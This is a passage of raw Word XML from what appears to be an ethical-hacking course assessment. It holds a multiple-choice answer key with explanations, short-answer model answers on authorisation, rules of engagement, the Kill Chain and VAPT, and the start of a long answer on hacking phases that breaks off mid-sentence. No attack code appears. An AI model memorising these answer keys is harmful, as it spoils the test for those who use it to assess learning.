          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Host-Only mode is required by Metasploit licensing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It makes Nmap scans faster</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer Key</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975"/>
        <w:gridCol w:w="975"/>
        <w:gridCol w:w="7796"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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Q#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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Answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Scope is a legal boundary, not a suggestion — any extension needs written approval first.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Section 66F defines cyber terrorism, carrying a punishment of imprisonment for life.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Authorisation, not intent, determines legality — accessing a system without permission is unauthorised access regardless of motive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Actually destroying logs/evidence would itself be harmful and hide useful information the client needs — so this phase is explained, not performed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Exploitation is where the delivered payload takes advantage of a vulnerability to execute; Installation is the subsequent persistence step.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Purple teaming bridges red and blue so techniques and detections are shared immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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 raw CVSS score ignores real-world exploitability and context; it must be validated before prioritisation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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The NDA specifically covers confidentiality obligations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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PTES order is Pre-engagement → Intelligence Gathering → Threat Modelling → Vulnerability Analysis → Exploitation → Post-Exploitation → Reporting.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Bridged networking would place intentionally vulnerable machines on a real, potentially internet-facing network — a serious safety risk.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-Answer Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Differentiate between a White Hat and a Grey Hat hacker.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Both may have good intentions, but a White Hat always has written authorisation before testing, while a Grey Hat tests without authorisation. Because authorisation (not intent) determines legality, a Grey Hat's actions remain unauthorised access even when the findings are reported helpfully, whereas a White Hat's identical actions are fully legal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why do organisations choose to pay for penetration testing rather than rely only on automated vulnerability scanners?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Automated scanners find known patterns but cannot chain weaknesses together, confirm real exploitability, or uncover business-logic flaws. Penetration testing adds manual exploitation that proves actual impact, which is what regulators, auditors and executives need to justify spending on fixes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explain the role of the Rules of Engagement (RoE) document in an engagement.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The RoE defines the practical boundaries of testing: the exact time window, which techniques are permitted or forbidden (e.g. no denial-of-service), emergency contact details, and the escalation process if a critical system is accidentally affected. It protects both the client's operations and the tester's legal position.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> How does the Cyber Kill Chain help a Blue Team, even though it was originally described from an attacker's perspective?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Because an attacker must succeed at every one of the seven stages to complete an intrusion, a defender gains multiple opportunities to stop the attack. Mapping detections and controls to each stage (e.g. email filtering at Delivery, EDR at Installation) turns the model into a practical defensive checklist.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is the difference between a Vulnerability Assessment and a Penetration Test?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A Vulnerability Assessment is largely automated and broad — it identifies and lists weaknesses using scanners, without exploiting them. A Penetration Test is manual, targeted and deep — it actively exploits selected weaknesses to prove real business impact. VAPT combines both for breadth and depth.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-Answer / Descriptive Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Describe the five phases of ethical hacking in detail, with one real-world example for each phase and an explanation of how an authorised tester's approach differs from a malicious attacker's at each stage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The five phases are Reconnaissance, Scanning &amp; Enumeration, Gaining Access, Maintaining Access, and Covering Tracks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> gathers information about the target passively (OSINT, WHOIS) or actively, without attacking — as seen in the 2013 Target breach, where attackers used OSINT and phishing against a third-party vendor. An authorised tester stays strictly within scope and avoids contacting out-of-scope third parties.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scanning &amp; Enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> actively probes for open ports and services, as WannaCry's attackers did at internet scale against SMBv1. A tester only scans in-scope ranges during the agreed window, at an agreed intensity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Gaining Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploits a found weakness, as in the 2017 Equifax breach via an unpatched Apache Struts CVE. A tester uses controlled, minimally destructive exploits and documents every attempt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Maintaining Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> installs persistence, as APT29 does with custom malware. A tester demonstrates that persistence is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
